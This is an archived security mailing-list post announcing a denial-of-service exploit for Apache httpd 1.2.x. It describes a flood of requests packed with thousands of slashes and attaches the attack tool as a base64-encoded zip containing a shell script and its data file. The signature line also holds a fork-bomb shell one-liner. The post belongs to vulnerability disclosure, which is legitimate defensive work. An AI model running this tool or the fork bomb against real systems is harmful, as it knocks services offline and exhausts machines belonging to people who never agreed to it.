Apache DoS attack?

• Previous message: Chris A. Epler: "iPass RoamServer 3.1"
• Next in thread: Micha³ Zalewski: "Re: Apache DoS attack?"
• Reply: Micha³ Zalewski: "Re: Apache DoS attack?"
• Reply: Mark Lowes: "Re: Apache DoS attack?"
• Reply: Zen: "Re: Apache DoS attack?"
• Reply: Pancrazio DE MAURO: "Re: Apache DoS attack?"
• Reply: Marc Slemko: "Re: Apache DoS attack?"
• Reply: Jim Hribnak: "Re: Apache DoS attack?"
• Reply: Marc Slemko: "Re: Apache DoS attack?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This is a multi-part message in MIME format.

------=_NextPart_000_0041_01BD1513.0F761240
Content-Type: text/plain;
        charset="iso-8859-2"
Content-Transfer-Encoding: quoted-printable



[execuse me if it has been discovered before]

Here's a simple exploit for Apache httpd version 1.2.x (tested on =
1.2.4).
When launched, causes incerases of victim's load average and extreme
slowdowns of disk operations. On my i586 Linux annoying slowdown has =
been
experienced immediately (after maybe 5 seconds). After about 4 minutes
work has been turned into real hell (286?).

Attached program ('beck') is a shell script. It works by sending
excessive http requests with thousands of '/'s inside (parsed from file
'beck.dat'). Single request causes just a little longer thinking of
Apache. But when requests are sent from a loop - huh, victim
system becomes slower and slower... At least on my machine, maybe when
Apache is running on a lightspeed workstation this script makes no
difference.

PS. Fast connection should help... All depends on victim's system
performance.

_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private]
=3D--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] =
---------=3D


------=_NextPart_000_0041_01BD1513.0F761240
Content-Type: application/x-zip-compressed;
        name="beck.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
        filename="beck.zip"

UEsDBBQAAgAIAGCmnSMQwy97+QEAAKADAAAEABAAYmVja1VYDADzFKg0I/+nNAAAAACFUl1P2zAU
fc+vOHgVbJqStvAydYDGumpCDJAKe1mFwHFuawvXrmynQdN+/JyPfrBNmh8iJTnn3HPO9ZuDfq5M
P+deJgkJaZsH2OfJ+AppiosVF5IwzI6zF3who7iGneOO1kqQBw+Bi2fWkS7KIK0b4VoJGXE/uKbK
PyucasGXoZx/yq33mQ/c/1Qiq3iVrfR5S04SNccMrDdkODsDY3j4iCDJJEAr/v3u4utkhN4AcXRQ
y0dpfcBMSKUL/8A63BaOVzCk4EXhyPvaffsHrjRGmUWXke1RW1G0J4WxWU3zalnqwA2RLT2ENYai
jjUes5PBKwcvKmCQzFWSjG9vbh6/XV5f3p+dDLYhjxkO/gi5B+wdN9QGe4B0jpzEc1bw8Fcnk+n0
djrCXGnC0QZ1hGUZI+eEleaCCigDUTpHJqBQLvu30W6DzT7rUnpDvF0rjt7O2H7kd/XlGAen348R
LHhuXcg29+BeknLQlhfga3J8QfDWGlRKawitljmkWkhyiMCFDD4yk0rWKWZ13rjjmLSoHQbShkLt
5sMAp9siDs/7Ba37poyChxHW9brzypBGNfa08r8WjlZIRSf1tF9612NqwMZ764wOYy+O6mtRxP1X
XIXYSZZlYA1r4/U/E9nWPWvHNpHq4zVFyLB5K6yhnRd2e1XPiCtpvv8GUEsDBBQAAgAIAHmdnSPu
voPlIgAAAPYfAAAIABAAYmVjay5kYXRVWAwAZwSoNGbvpzQAAAAA7cFBEQAABACwvxQaSOEU0D+L
HO62TW8WAAAAAAAAAPBPHFBLAQIVAxQAAgAIAGCmnSMQwy97+QEAAKADAAAEAAwAAAAAAAEAAED/
gQAAAABiZWNrVVgIAPMUqDQj/6c0UEsBAhUDFAACAAgAeZ2dI+6+g+UiAAAA9h8AAAgADAAAAAAA
AQAAQLaBKwIAAGJlY2suZGF0VVgIAGcEqDRm76c0UEsFBgAAAAACAAIAgAAAAIMCAAAAAA==

------=_NextPart_000_0041_01BD1513.0F761240--

• Next message: Mark Whitis: "Re: StackGuard: Automatic Protection From Stack-smashing Attacks"
• Previous message: Chris A. Epler: "iPass RoamServer 3.1"
• Next in thread: Micha³ Zalewski: "Re: Apache DoS attack?"
• Reply: Micha³ Zalewski: "Re: Apache DoS attack?"
• Reply: Mark Lowes: "Re: Apache DoS attack?"
• Reply: Zen: "Re: Apache DoS attack?"
• Reply: Pancrazio DE MAURO: "Re: Apache DoS attack?"
• Reply: Marc Slemko: "Re: Apache DoS attack?"
• Reply: Jim Hribnak: "Re: Apache DoS attack?"
• Reply: Marc Slemko: "Re: Apache DoS attack?"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:37:48 PDT